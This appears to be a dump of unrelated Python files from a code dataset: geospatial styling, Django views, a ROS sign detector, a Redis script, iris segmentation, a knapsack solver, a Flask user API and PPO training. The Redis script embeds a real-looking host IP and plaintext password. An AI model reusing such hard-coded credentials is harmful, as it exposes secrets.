        user='postgres',
        password='admin',
        host='localhost',
        port='5432',
        schema='public',
        pg_table_name=None,
        point_size=6,
        well_known_name='circle',
        point_rotation=0,
        stroke_linecap='round',
        stroke_dasharray=None,
        perpendicular_offset=None,
        feature_label=False,
        font_family='Aerial',
        font_color="#333333",
        font_size=14,
        font_weight='normal',
        font_style="normal",
        halo_color="#ffffff",
        halo_radius=1,
        continuous_legend=True,
    ):
        # Database connectivity is delegated to the Pg mixin.
        Pg.__init__(self, dbname, user, password, host, port)
        # Vector styling (simple/categorized/classified) parameters.
        ClassifiedStyle.__init__(
            self,
            attribute_name=attribute_name,
            values=values,
            color_palette=color_palette,
            number_of_class=number_of_class,
            classification_method=classification_method,
            style_name=style_name,
            geom_type=geom_type,
            fill_color=fill_color,
            stroke_color=stroke_color,
            stroke_width=stroke_width,
            opacity=opacity,
            point_size=point_size,
            well_known_name=well_known_name,
            point_rotation=point_rotation,
            stroke_linecap=stroke_linecap,
            stroke_dasharray=stroke_dasharray,
            perpendicular_offset=perpendicular_offset,
            feature_label=feature_label,
            font_family=font_family,
            font_color=font_color,
            font_size=font_size,
            font_weight=font_weight,
            font_style=font_style,
            halo_color=halo_color,
            halo_radius=halo_radius
        )
        # Raster styling parameters (shares style_name/palette/opacity).
        RasterStyle.__init__(
            self,
            style_name=style_name,
            color_palette=color_palette,
            number_of_class=number_of_class,
            opacity=opacity,
            continuous_legend=continuous_legend
        )
        # The schema of the table from postgresql
        self.schema = schema
        self.pg_table_name = pg_table_name

    def connect_pg(self, dbname, user, password, host, port):
        """Replace the stored connection parameters and (re)connect."""
        self.dbname = dbname
        self.user = user
        self.password = password
        self.host = host
        self.port = port
        self.connect()

    def get_attribute_name(self, pg_table_name=None):
        '''
        Help to connect with postgresql and set the attribute_name.
        The attribute name will be the column_name of the shapefile attribute table.
        When no attribute_name was configured, one is picked at random
        from the table's columns.
        '''
        if self.conn is None:
            self.connect()
        if pg_table_name is not None:
            self.pg_table_name = pg_table_name
        if self.attribute_name is None:
            # Function to get the column_names from postgres
            columns = self.get_column_names(self.pg_table_name)
            self.attribute_name = random.choice(columns)
            return self.attribute_name
        else:
            return self.attribute_name

    def get_values_from_pg(self):
        """
        Get the values from postgresql and set it to self.values

        Parameters used:
        ----------------
        self.conn : connection class
            It will be automatically connected if user provides the connection parameters
        self.values : array
            The values from specific column of postgres
        self.attribute_name: str
            The column name of the table
        self.pg_table_name: str
        self.schema: str
        """
        if self.conn is None:
            self.connect()
        if self.attribute_name is None:
            self.attribute_name = self.get_attribute_name()
        self.values = self.get_values_from_column(
            column=self.attribute_name, table=self.pg_table_name, schema=self.schema)
        return self.values

    def generate_simple_style(self):
        """Single-rule style; needs no attribute values."""
        return self.simple_style()

    def generate_categorized_style(self):
        """One rule per distinct value; values are fetched lazily from postgres."""
        if self.values is None:
            self.get_values_from_pg()
        return self.categorized_style()

    def generate_classified_style(self):
        """Binned (classified) style; values are fetched lazily from postgres."""
        if self.values is None:
            self.get_values_from_pg()
        return self.classified_style()

    def generate_raster_style(self, max_value, min_value):
        """Color-map style over the raster's [min_value, max_value] range."""
        return self.coverage_style(max_value, min_value)
|
15,908 | 08d5e94e816b03456f48b074d7d1d162a6f6a68f | from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from .models import Store, Client
from django.http import HttpResponseNotFound
from django.contrib.auth.models import User
from django.contrib import auth
# Create your views here.
def index(request):
    """Landing page."""
    template = 'index.html'
    return render(request, template)
def main(request):
    """Main menu page."""
    template = 'main.html'
    return render(request, template)
def wait(request, store_id):
    """Waiting-list page for one store.

    Renders the store plus every registered client phone number.  The
    template context keeps its historical keys: ``aa`` is the total row
    count and ``num`` the last row of the phone-number queryset.
    """
    store_detail = get_object_or_404(Store, pk=store_id)
    clients = Client.objects
    clientph = Client.objects.values('phonenum')
    aa = 0
    # FIX: the loop variable was unbound when no clients exist, making the
    # render() call below raise NameError; it now defaults to None.
    i = None
    for i in clientph.values():
        aa += 1
    # (A stray no-op expression statement `i` was removed here.)
    return render(request, 'wait.html', {'store': store_detail, 'clients': clients, 'num': i, 'aa': aa, 'clientph': clientph})
def store(request):
    """Store list, paginated five per page, with page numbers for nav links."""
    all_stores = Store.objects.all()
    paginator = Paginator(all_stores, 5)
    page = request.GET.get('page')
    try:
        posts = paginator.page(page)
    except PageNotAnInteger:
        # Missing or non-numeric ?page= falls back to the first page.
        page = 1
        posts = paginator.page(page)
    except EmptyPage:
        # Out-of-range page numbers clamp to the last page.
        posts = paginator.page(paginator.num_pages)
    context = {'posts': posts, 'pages': range(1, paginator.num_pages+1), 'current': int(page), 'user': request.user }
    return render(request, 'home.html', context)
def search(request):
    """Search stores by location text (POST only)."""
    if request.method != 'POST':
        return HttpResponseNotFound("없는 페이지 입니다.")
    matches = Store.objects.filter(body__icontains=request.POST['search'])
    print(matches)
    return render(request,'search.html',{'posts':matches,'user':request.user })
def phone(request):
    """Phone-number entry page."""
    return render(request, 'phone.html')
def clientnew(request):
    """Register a client phone number and return to the store list."""
    new_client = Client()
    new_client.phonenum = request.POST['phonenum']
    new_client.save()
    return redirect('/store')
def signup(request):
    """Create a user account from the signup form and log the new user in.

    On GET — or on a POST whose passwords do not match — the signup form
    is (re-)rendered; a successful POST redirects to the store list.
    """
    if request.method == 'POST':
        if request.POST['password1'] == request.POST['password2']:
            user = User.objects.create_user(
                request.POST['username'], password=request.POST['password1'])
            auth.login(request, user)
            return redirect('store')
        # NOTE(review): a password mismatch silently falls through to the
        # form with no error — consider surfacing one via template context.
    return render(request, 'accounts/signup.html')
def login(request):
    """Authenticate a user; re-render the form with an error on failure."""
    if request.method != 'POST':
        return render(request, 'accounts/login.html')
    user = auth.authenticate(
        request,
        username=request.POST['username'],
        password=request.POST['password'],
    )
    if user is None:
        return render(request, 'accounts/login.html', {'error': 'username or password is incorrect.'})
    auth.login(request, user)
    return redirect('store')
def logout(request):
    """Log the user out on POST; any other method shows the signup page."""
    if request.method == 'POST':
        auth.logout(request)
        return redirect('store')
    return render(request, 'accounts/signup.html')
def new(request):
    """Store creation form."""
    return render(request, 'new.html')
def create(request):
    """Create a store from the submitted form fields.

    NOTE(review): this mutates data from a GET request — it should be a
    CSRF-protected POST; confirm the templates before changing.
    """
    new_store = Store()
    new_store.title = request.GET['storename']
    new_store.body = request.GET['location']
    new_store.time = request.GET['cookingtime']
    new_store.author = request.user
    new_store.pup_date = timezone.datetime.now()
    new_store.save()
    return redirect('/store/')
|
15,909 | 074f440002fbb57996f95c719b48c027f107b272 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import numpy as np
import cv2
from cv_bridge import CvBridge
from sensor_msgs.msg import Image, CompressedImage
class DetectSign():
    """Detect solid-color signs (red / green / blue) in the camera stream and
    coordinate a multi-robot mission by flipping shared ROS parameters.

    NOTE: __init__ runs the 10 Hz processing loop itself and only returns on
    shutdown, so constructing the object starts the node.
    """

    def __init__(self):
        # parameter for communication
        # rospy.set_param('/tb2/mission_start', False)
        # rospy.set_param('/tb3/mission_start', False)

        # HSV thresholds for each sign color (private ROS params with defaults)
        self.hue_red_l = rospy.get_param("~detect/lane/red/hue_l", 0)
        self.hue_red_h = rospy.get_param("~detect/lane/red/hue_h", 9)
        self.saturation_red_l = rospy.get_param("~detect/lane/red/saturation_l", 255)
        self.saturation_red_h = rospy.get_param("~detect/lane/red/saturation_h", 255)
        self.lightness_red_l = rospy.get_param("~detect/lane/red/lightness_l", 179)
        self.lightness_red_h = rospy.get_param("~detect/lane/red/lightness_h", 255)

        self.hue_green_l = rospy.get_param("~detect/lane/green/hue_l", 38)
        self.hue_green_h = rospy.get_param("~detect/lane/green/hue_h", 72)
        self.saturation_green_l = rospy.get_param("~detect/lane/green/saturation_l", 200)
        self.saturation_green_h = rospy.get_param("~detect/lane/green/saturation_h", 255)
        self.lightness_green_l = rospy.get_param("~detect/lane/green/lightness_l", 34)
        self.lightness_green_h = rospy.get_param("~detect/lane/green/lightness_h", 255)

        self.hue_blue_l = rospy.get_param("~detect/lane/blue/hue_l", 78)
        self.hue_blue_h = rospy.get_param("~detect/lane/blue/hue_h", 117)
        self.saturation_blue_l = rospy.get_param("~detect/lane/blue/saturation_l", 222)
        self.saturation_blue_h = rospy.get_param("~detect/lane/blue/saturation_h", 255)
        self.lightness_blue_l = rospy.get_param("~detect/lane/blue/lightness_l", 165)
        self.lightness_blue_h = rospy.get_param("~detect/lane/blue/lightness_h", 255)

        self.sub_image_type = "raw"  # "compressed" / "raw"
        self.pub_image_type = "raw"  # "compressed" / "raw"

        self.counter = 1

        if self.sub_image_type == "compressed":
            # subscribes compressed image
            self.sub_image_original = rospy.Subscriber('/detect/image_input/compressed', CompressedImage, self.cbGetImage, queue_size = 1)
        elif self.sub_image_type == "raw":
            # subscribes raw image
            self.sub_image_original = rospy.Subscriber('/detect/image_input', Image, self.cbGetImage, queue_size = 1)

        if self.pub_image_type == "compressed":
            # publishes compensated image in compressed type
            self.pub_image_sign = rospy.Publisher('/detect/image_output/compressed', CompressedImage, queue_size = 1)
        elif self.pub_image_type == "raw":
            # publishes compensated image in raw type
            self.pub_image_sign = rospy.Publisher('/detect/image_output', Image, queue_size = 1)

        self.cvBridge = CvBridge()
        self.cv_image = None
        self.is_image_available = False

        rospy.sleep(1)

        # processing loop: runs until shutdown, handling the latest frame at 10 Hz
        loop_rate = rospy.Rate(10)
        while not rospy.is_shutdown():
            if self.is_image_available:
                self.fnFindSign()
            loop_rate.sleep()

    def cbGetImage(self, image_msg):
        """Image callback: keep every third frame for processing.

        The counter cycles 1 -> 2 -> 3; only the third frame is decoded, so
        the stream is downsampled to 1/3 of the camera rate (the original
        comment claimed 1/5 — the code has always dropped 2 of 3 frames).
        """
        if self.counter % 3 != 0:
            self.counter += 1
            return
        self.counter = 1

        if self.sub_image_type == "compressed":
            # np.fromstring is deprecated for binary input; frombuffer is the
            # documented replacement (and avoids an extra copy).
            np_arr = np.frombuffer(image_msg.data, np.uint8)
            self.cv_image = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)
        else:
            self.cv_image = self.cvBridge.imgmsg_to_cv2(image_msg, "bgr8")

        self.is_image_available = True

    def fnFindSign(self):
        """Count pixels of each sign color and update mission parameters."""
        # Each mask is inverted (matching pixels == 0), so counting zero pixels
        # counts the pixels of that color.
        cv_image_mask_g = cv2.GaussianBlur(self.fnMaskGreenSign(), (5, 5), 0)
        self.detected_green = np.count_nonzero(cv_image_mask_g == 0)

        cv_image_mask_b = cv2.GaussianBlur(self.fnMaskBlueSign(), (5, 5), 0)
        self.detected_blue = np.count_nonzero(cv_image_mask_b == 0)

        cv_image_mask_r = cv2.GaussianBlur(self.fnMaskRedSign(), (5, 5), 0)
        self.detected_red = np.count_nonzero(cv_image_mask_r == 0)

        # green sign alone -> start turtlebot3's mission
        if self.detected_green > 3000 and self.detected_blue < 100 and self.detected_red < 100:
            rospy.set_param('/tb3/mission_start', True)
            print("TURTLEBOT3 MISSION START")
        # blue sign alone -> start turtlebot2's mission
        if self.detected_blue > 3000 and self.detected_green < 100 and self.detected_red < 100:
            rospy.set_param('/tb2/mission_start', True)
            print("TURTLEBOT2 MISSION START")
        # strong red alone -> halt tb1 until tb2 reports aligned
        if self.detected_red > 1000 and self.detected_green < 100 and self.detected_blue < 100:
            rospy.set_param('/tb1/move_forward', False)
            print("WAIT FOR TB2 ALIGNED")
        # weaker red + tb2 aligned -> release tb1 toward the parking lot
        if self.detected_red > 500 and self.detected_green < 100 and self.detected_blue < 100 and rospy.get_param('/tb2/aligned') == True:
            self.detected_red = 0
            rospy.set_param('/tb1/move_forward', True)
            print("GO TO PARKING LOT")
        # blue and green together -> tb1 starts the parking maneuver
        if self.detected_blue > 1000 and self.detected_green > 1000:
            rospy.set_param('/tb1/move_forward', False)
            rospy.set_param('/tb1/parking_start', True)
            print("PARKING")

    def _fnMaskColor(self, lower, upper):
        """Return an *inverted* binary mask of self.cv_image: pixels whose HSV
        value lies within [lower, upper] become 0, everything else 255."""
        hsv = cv2.cvtColor(np.copy(self.cv_image), cv2.COLOR_BGR2HSV)
        mask = cv2.inRange(hsv, np.array(lower), np.array(upper))
        return cv2.bitwise_not(mask)

    def fnMaskRedSign(self):
        """Inverted mask of red-sign pixels (uses the red HSV thresholds)."""
        return self._fnMaskColor(
            [self.hue_red_l, self.saturation_red_l, self.lightness_red_l],
            [self.hue_red_h, self.saturation_red_h, self.lightness_red_h])

    def fnMaskBlueSign(self):
        """Inverted mask of blue-sign pixels (uses the blue HSV thresholds)."""
        return self._fnMaskColor(
            [self.hue_blue_l, self.saturation_blue_l, self.lightness_blue_l],
            [self.hue_blue_h, self.saturation_blue_h, self.lightness_blue_h])

    def fnMaskGreenSign(self):
        """Inverted mask of green-sign pixels (uses the green HSV thresholds)."""
        return self._fnMaskColor(
            [self.hue_green_l, self.saturation_green_l, self.lightness_green_l],
            [self.hue_green_h, self.saturation_green_h, self.lightness_green_h])

    def main(self):
        rospy.spin()
if __name__ == '__main__':
    rospy.init_node('sign_detector')
    # NOTE(review): DetectSign.__init__ contains the processing loop and only
    # returns on shutdown, so constructing it is enough; node.main() is never
    # reached or needed here.
    node = DetectSign()
|
15,910 | fdbbd644f18849263b99dd867946f9dcf0974b4f | #!/bin/python
# -*- coding:utf-8 -*-
import os
import os.path
import MySQLdb
import time
import re
import redis
import random
# Connect to the coupon Redis instance.
# NOTE(review): host/port/password are hard-coded — consider moving to config.
r = redis.Redis(host="10.66.137.165", port = 6379, password="yeejay501")
random.seed(int(time.time()))

# Draw up to 19 six-digit numbers (range(1, 20) iterates 19 times); the dict
# silently de-duplicates any collisions.
nums={}
for i in range(1,20):
    num = random.randint(100001,999999)
    nums[num] = 1

# Register each number that has not been issued yet, with a 7-day TTL.
for num, v in nums.items():
    key="22_%d"%(num)
    val = r.get(key)
    if val is not None:
        # already issued — skip it
        continue
    print num  # Python 2 print statement: this file is not Python 3 compatible
    r.set(key,"1",ex=3600*24*7)
|
15,911 | d7199620d85a15459a44fda78c9402280e65f956 | from seg_master import UNet
import glob
import cv2
import numpy as np
from PIL import Image
# Source/destination folders for the batch iris-segmentation run.
src_path = "D:/2. data/total_iris/original_4/"
dst_path = "D:/2. data/total_iris/only_iris_4/"

image_paths = sorted(glob.glob(src_path + "*.png"))

images_rgb_np = []
images_bgr = []   # NOTE(review): populated below but never used afterwards
image_names = []
size = 640, 480   # (width, height) expected by the UNet models

# Load every PNG, resize to the network input size; keep RGB numpy arrays for
# inference (and unused BGR PIL copies).
for i, image_path in enumerate(image_paths):
    image_names.append(image_path.split("\\")[-1])
    image_rgb = Image.open(image_path).convert("RGB")
    image_rgb = image_rgb.resize(size, resample=Image.BICUBIC)
    # convert bgr
    r, g, b = image_rgb.split()
    image_bgr = Image.merge("RGB", (b, g, r))
    images_bgr.append(image_bgr)
    image_rgb = np.array(image_rgb)
    images_rgb_np.append(image_rgb)

# Normalize pixel values to [0, 1] for the network.
rgb_dataset = np.array(images_rgb_np, dtype="float") / 255.0

# One UNet instance; weights are swapped between the pupil and iris models.
m = UNet.UNet(nClasses=1, input_height=480, input_width=640)

pupil_h5model_name = "seg_master/unet_pupil_weight.h5"
m.load_weights(pupil_h5model_name)
pupil_predicts = m.predict(rgb_dataset, batch_size=2)

iris_h5model_name = "seg_master/unet_iris_weight.h5"
m.load_weights(iris_h5model_name)
iris_predicts = m.predict(rgb_dataset, batch_size=2)

# Compose output: pupil pixels -> gray (100), outside-iris -> gray (100),
# iris ring keeps the original pixels.
for image_rgb, pupil_predict, iris_predict, image_name in zip(images_rgb_np, pupil_predicts, iris_predicts, image_names):
    pupil_segmentation = np.where(pupil_predict > 0.5, 100, image_rgb)
    iris_segmentation_6 = np.where(iris_predict > 0.6, pupil_segmentation, 100)
    # NOTE(review): the variable name suggests a 0.5 threshold but 0.6 is used
    # (identical to the line above) — looks like a copy-paste; confirm which
    # threshold was intended.
    iris_segmentation_5 = np.where(iris_predict > 0.6, pupil_segmentation, 100)
    # Image._show(Image.fromarray(image_rgb))
    # Image._show(Image.fromarray(iris_segmentation))
    # filename = image_name[:-4] + +".png"
    Image.fromarray(iris_segmentation_5).save(dst_path + "" + image_name)
|
15,912 | e09d449aa497fc1d0d3fc37ca29b36e70d11b1cc | def resolve():
MAX_N = 100
MAX_W = 10000
dp = [[0] * (MAX_W + 1) for _ in range(MAX_N + 1)] # メモ化テーブル
n = int(input())
w = int(input())
wv = []
for i in range(n):
wv.append(list(map(int, input().split(" "))))
# 末端からループを回す
for node in range(n - 1, -1, -1):
# 表の列のすべての要素において"ベストな付加価値の値"を探す
for w_rest in range(w + 1):
if w_rest < wv[node][0]:
dp[node][w_rest] = dp[node + 1][w_rest]
else:
# 足す・足さないで付加価値が大きくなるほうをnodeのベストな値として登録する
dp[node][w_rest] = max(dp[node + 1][w_rest], dp[node + 1][w_rest - wv[node][0]] + wv[node][1])
print(dp[0][w])
# if __name__ == "__main__": # 提出時のみ復活させる
# resolve()
import sys
from io import StringIO
import unittest
class TestClass(unittest.TestCase):
    """Drives resolve() through stdin/stdout redirection, AtCoder-style."""

    def assertIO(self, input, output):
        """Run resolve() with *input* on stdin and assert it prints *output*.

        Swaps sys.stdin/sys.stdout for StringIO buffers for the duration of
        the call, then restores them; the trailing newline of the captured
        output is stripped before comparison.
        """
        stdout, stdin = sys.stdout, sys.stdin
        sys.stdout, sys.stdin = StringIO(), StringIO(input)
        resolve()
        sys.stdout.seek(0)
        out = sys.stdout.read()[:-1]
        sys.stdout, sys.stdin = stdout, stdin
        self.assertEqual(out, output)

    def test_入力例_1(self):
        # sample case 1 from the problem statement (the continuation lines of
        # the triple-quoted literal must stay unindented — they are data)
        input = """4
5
2 3
1 2
3 4
2 2"""
        output = """7"""
        self.assertIO(input, output)

if __name__ == "__main__":
    unittest.main()
|
15,913 | db6c791fa71f82ca103b0fcc870ed79b8980320d | from django.apps import AppConfig
class CookieappConfig(AppConfig):
    """Django application configuration for the cookieapp app."""
    name = 'cookieapp'
|
15,914 | 924aea1905aa8ed3841b9e34ba2310377dd07176 | from flask import Flask, request, jsonify, make_response
import requests
import json
app = Flask(__name__)
def is_sha1(maybe_sha):
    """Return True iff *maybe_sha* looks like a SHA-1 hex digest (40 hex chars).

    Uses int(..., 16) for the hex check, so values int() tolerates (surrounding
    whitespace, a sign prefix) also pass — acceptable for this API's purposes.
    """
    if len(maybe_sha) != 40:
        return False
    try:
        int(maybe_sha, 16)
    except (ValueError, TypeError):
        # was a bare `except:`, which also swallowed SystemExit/KeyboardInterrupt
        return False
    return True
# api 1
@app.route('/api/v1/users', methods=['PUT'])
def adduser():
    """Create a new user.

    Expects JSON {"username": ..., "password": <40-char SHA-1 hex>}.
    Returns 201 on success, 400 on any validation failure or duplicate.
    """
    # every API hit bumps the shared request counter on the DB service
    requests.post(
        "http://3.212.93.206:80/api/v1/db/write",
        data=json.dumps({
            "ORIGIN": "USER",
            "COMMAND": "ADD_REQUEST_COUNT"
        })
    )
    req = request.get_json()
    if req is None:
        return make_response('Request body is empty.', 400)
    if 'username' not in req or 'password' not in req:
        return make_response('Username or password is not present in request body.', 400)
    username = req["username"]
    password = req["password"]
    if username == '' or username is None or password is None or password == '':
        return make_response('Username or password is empty.', 400)
    # passwords must arrive pre-hashed as SHA-1 hex
    if (not is_sha1(password)):
        return make_response('Password is not as per given norms.', 400)
    # reject duplicates: ask the DB service whether the username exists
    if (requests.get(
        "http://3.212.93.206:80/api/v1/db/read",
        params={
            "ORIGIN": "USER",
            "COMMAND": "EXISTS",
            "FIELD": "username",
            "VALUE": username,
            "DB": "Users"
        }
    )).json()["count"] != 0:
        return make_response('User already exists.', 400)
    requests.post(
        "http://3.212.93.206:80/api/v1/db/write",
        data=json.dumps({
            "ORIGIN": "USER",
            "COMMAND": "INSERT",
            "FIELDS": ["username", "password"],
            "VALUES": [username, password],
            "DB": "Users"
        })
    )
    return make_response('Created user.', 201)
# api 2
@app.route('/api/v1/users/<username>', methods=['DELETE'])
def deleteuser(username):
    """Delete an existing user by username. 200 on success, 400 when absent."""
    # bump the shared request counter on the DB service
    requests.post(
        "http://3.212.93.206:80/api/v1/db/write",
        data=json.dumps({
            "ORIGIN": "USER",
            "COMMAND": "ADD_REQUEST_COUNT"
        })
    )
    if username == '' or username is None:
        return make_response('Usename is empty.', 400)
    # the user must exist before we attempt to delete it
    if (requests.get(
        "http://3.212.93.206:80/api/v1/db/read",
        params={
            "ORIGIN": "USER",
            "COMMAND": "EXISTS",
            "FIELD": "username",
            "VALUE": username,
            "DB": "Users"
        }
    )).json()["count"] == 0:
        return make_response('User does not exist.', 400)
    requests.post(
        "http://3.212.93.206:80/api/v1/db/write",
        data=json.dumps({
            "ORIGIN": "USER",
            "COMMAND": "DELETE",
            "FIELD": "username",
            "VALUE": username,
            "DB": "Users"
        })
    )
    return make_response('Deleted user.', 200)
# api 10
@app.route('/api/v1/users', methods=['GET'])
def read_all():
    """List every user record; 204 when the Users table is empty."""
    # bump the shared request counter on the DB service
    requests.post(
        "http://3.212.93.206:80/api/v1/db/write",
        data=json.dumps({
            "ORIGIN": "USER",
            "COMMAND": "ADD_REQUEST_COUNT"
        })
    )
    db_response = requests.get(
        "http://3.212.93.206:80/api/v1/db/read",
        params={
            "ORIGIN": "USER",
            "COMMAND": "READ_ALL",
            "DB": "Users"
        }
    )
    if db_response.status_code == 204:
        return make_response('', 204)
    if db_response.status_code == 200:
        return make_response(jsonify(db_response.json()['readall']), 200)
# api 11
@app.route('/api/v1/db/clear', methods=['POST'])
def delete_all():
    """Wipe every record held by the DB service."""
    payload = {
        "ORIGIN": "USER",
        "COMMAND": "DELETE_ALL"
    }
    requests.post(
        "http://3.212.93.206:80/api/v1/db/write",
        data=json.dumps(payload)
    )
    return make_response('', 200)
# api 12
@app.route('/api/v1/_count', methods=['GET'])
def count_requests():
    """Report how many API requests the DB service has counted so far."""
    db_response = requests.get(
        "http://3.212.93.206:80/api/v1/db/read",
        params={
            "ORIGIN": "USER",
            "COMMAND": "READ_REQUEST_COUNT"
        }
    )
    if db_response.status_code == 200:
        return make_response(jsonify(db_response.json()['count']), 200)
# api 13
@app.route('/api/v1/_count', methods=['DELETE'])
def reset_request_count():
    """Reset the DB service's request counter to zero."""
    payload = {
        "ORIGIN": "USER",
        "COMMAND": "RESET_REQUEST_COUNT"
    }
    requests.post(
        "http://3.212.93.206:80/api/v1/db/write",
        data=json.dumps(payload)
    )
    return make_response('', 200)
@app.route('/api/v1/users/health_check', methods=['GET'])
def health_check():
    """Liveness probe — always responds 200 with an empty body."""
    return make_response('', 200)
if __name__ == '__main__':
    # bind on all interfaces; debug disabled for deployment
    app.run(host='0.0.0.0', debug=False)
|
15,915 | e2cfc0c0b1766ed1864359efde2e6073db4b781b | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal
import gym
import numpy as np
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Memory:
    """Rollout buffer for PPO: one epoch of transitions, stored as parallel lists.

    PPO is on-policy, so — unlike DDPG's replay buffer — the contents are
    flushed after every policy update.
    """
    def __init__(self):
        # one entry per environment step, index-aligned across all lists
        self.actions = []
        self.states = []        # concatenated observation + goal vectors
        self.logprobs = []      # log pi(a|s) under the policy that acted
        self.rewards = []
        self.is_terminals = []

    def clear_memory(self):
        """Drop every stored transition in place."""
        for buffer in (self.actions, self.states, self.logprobs,
                       self.rewards, self.is_terminals):
            del buffer[:]
class ActorCritic(nn.Module):
    '''
    Actor-critic pair for continuous-action PPO.

    For continuous action spaces the actor outputs the *mean* of each action
    dimension (tanh-squashed to [-1, 1]); actions are sampled from a
    multivariate Gaussian whose diagonal covariance is the fixed
    action_std**2 given at construction. The covariance balances the
    exploration-exploitation trade-off.
    '''
    def __init__(self, state_dim, action_dim, action_std):
        super(ActorCritic, self).__init__()
        # actor: state -> per-dimension action mean in [-1, 1]
        self.actor = nn.Sequential(
                nn.Linear(state_dim, 256),
                nn.ReLU(),
                nn.Linear(256, 256),
                nn.ReLU(),
                nn.Linear(256,256),
                nn.ReLU(),
                nn.Linear(256, action_dim),
                nn.Tanh()
                )
        # critic: state -> scalar state value V(s)
        self.critic = nn.Sequential(
                nn.Linear(state_dim, 256),
                nn.ReLU(),
                nn.Linear(256, 256),
                nn.ReLU(),
                nn.Linear(256, 256),
                nn.ReLU(),
                nn.Linear(256, 1)
                )
        # fixed per-dimension action variance (std**2), shared by all states
        self.action_var = torch.full((action_dim,), action_std*action_std).to(device)

    def forward(self):
        # use act()/evaluate() instead of calling the module directly
        raise NotImplementedError

    def act(self, state, memory):
        """Sample one action for *state*, recording (state, action, logprob)
        into *memory*; returns the detached action tensor."""
        action_mean = self.actor(state)
        # diagonal covariance built from the fixed per-dimension variance
        cov_mat = torch.diag(self.action_var).to(device)
        # Gaussian over actions centered on the actor's output
        dist = MultivariateNormal(action_mean, cov_mat)
        action = dist.sample()
        action_logprob = dist.log_prob(action)

        memory.states.append(state)
        memory.actions.append(action)
        memory.logprobs.append(action_logprob)

        return action.detach()

    def evaluate(self, state, action):
        """Score a batch of (state, action) pairs under the current policy.

        Returns (log-probabilities of the actions, state values with the
        trailing dim squeezed, distribution entropies).
        """
        action_mean = self.actor(state)
        action_var = self.action_var.expand_as(action_mean)
        # torch.diag_embed: batched diagonal covariance matrices
        cov_mat = torch.diag_embed(action_var).to(device)
        dist = MultivariateNormal(action_mean, cov_mat)

        # log probabilities, i.e. log pi(a|s)
        action_logprobs = dist.log_prob(action)
        dist_entropy = dist.entropy()
        state_value = self.critic(state)

        return action_logprobs, torch.squeeze(state_value), dist_entropy
class PPO:
    """Proximal Policy Optimization with a clipped surrogate objective."""
    def __init__(self, state_dim, action_dim, action_std, lr, betas, gamma, K_epochs, eps_clip):
        # K_epochs: optimization passes over each collected batch
        # eps_clip: clip range for the probability ratio
        self.lr = lr
        self.betas = betas
        self.gamma = gamma
        self.eps_clip = eps_clip
        self.K_epochs = K_epochs

        self.policy = ActorCritic(state_dim, action_dim, action_std).to(device)
        self.optimizer = torch.optim.Adam(self.policy.parameters(), lr=lr, betas=betas)
        # frozen snapshot of the policy that generates rollouts
        self.policy_old = ActorCritic(state_dim, action_dim, action_std).to(device)
        self.policy_old.load_state_dict(self.policy.state_dict())

        self.MseLoss = nn.MSELoss()

    def select_action(self, state, memory):
        """Sample an action from the old policy for one state; the transition
        is recorded into *memory* by policy_old.act()."""
        # flatten the state into a single-row tensor
        state = torch.FloatTensor(state.reshape(1, -1)).to(device)
        return self.policy_old.act(state, memory).cpu().data.numpy().flatten()

    def update(self, memory):
        """Run K_epochs of clipped-PPO optimization on the stored rollout,
        then sync policy_old with the updated policy."""
        # Monte Carlo estimate of rewards: walk the rollout backwards,
        # resetting the return at episode boundaries
        rewards = []
        discounted_reward = 0
        for reward, is_terminal in zip(reversed(memory.rewards), reversed(memory.is_terminals)):
            if is_terminal:
                discounted_reward = 0
            discounted_reward = reward + (self.gamma * discounted_reward)
            # prepend so `rewards` ends up in chronological order
            rewards.insert(0, discounted_reward)

        # Normalizing the rewards:
        rewards = torch.tensor(rewards).to(device)
        rewards = (rewards - rewards.mean()) / (rewards.std() + 1e-5)

        # convert list to tensor
        old_states = torch.squeeze(torch.stack(memory.states).to(device), 1).detach()
        old_actions = torch.squeeze(torch.stack(memory.actions).to(device), 1).detach()
        old_logprobs = torch.squeeze(torch.stack(memory.logprobs), 1).to(device).detach()

        # Optimize policy for K epochs:
        for _ in range(self.K_epochs):
            # Evaluating old actions and values :
            logprobs, state_values, dist_entropy = self.policy.evaluate(old_states, old_actions)

            # Finding the ratio (pi_theta / pi_theta__old):
            # exp(log(prob)) = prob
            ratios = torch.exp(logprobs - old_logprobs.detach())

            # Finding Surrogate Loss:
            advantages = rewards - state_values.detach()
            surr1 = ratios * advantages
            surr2 = torch.clamp(ratios, 1-self.eps_clip, 1+self.eps_clip) * advantages
            # total loss = clipped surrogate + value loss - entropy bonus
            loss = -torch.min(surr1, surr2) + 0.5*self.MseLoss(state_values, rewards) - 0.01*dist_entropy

            # take gradient step
            self.optimizer.zero_grad()
            loss.mean().backward()
            self.optimizer.step()

        # Copy new weights into old policy:
        self.policy_old.load_state_dict(self.policy.state_dict())
epoch_success_rate = []
clip_obs = 100
def _preproc_og( o, g):
#(o - o.mean())/o.std()
o = np.clip(o, -clip_obs, clip_obs)
#(g-g.mean())/g.std()
g = np.clip(g, -clip_obs, clip_obs)
return o, g
def launch():
    """Train PPO on HandManipulateEggFull-v0 for 350 epochs, evaluating the
    policy after each epoch and appending the mean success rate to the
    module-level `epoch_success_rate` list."""
    ############## Hyperparameters ##############
    env_name = "HandManipulateEggFull-v0"
    render = False
    solved_reward = 300         # stop training if avg_reward > solved_reward
    log_interval = 20           # print avg reward in the interval
    max_episodes = 800          # max training episodes
    max_timesteps = 1500        # max timesteps in one episode
    update_timestep = 400       # update policy every n timesteps
    action_std = 0.5            # constant std for action distribution (Multivariate Normal)
    K_epochs = 40               # update policy for K epochs
    eps_clip = 0.24             # clip parameter for PPO
    gamma = 0.99                # discount factor
    lr = 0.00101                # parameters for Adam optimizer
    betas = (0.9, 0.999)
    random_seed = 123
    #############################################

    # creating environment; the policy input is observation + desired goal
    env = gym.make(env_name)
    state_dim_pre = env.observation_space['observation'].shape[0]
    goal_dim = env.observation_space['desired_goal'].shape[0]
    state_dim = state_dim_pre + goal_dim
    action_dim = env.action_space.shape[0]
    env.seed(123)
    np.random.seed(123)
    torch.manual_seed(123)
    '''
    if random_seed:
        print("Random Seed: {}".format(random_seed))
        torch.manual_seed(random_seed)
        env.seed(random_seed)
        np.random.seed(random_seed)
    '''

    memory = Memory()
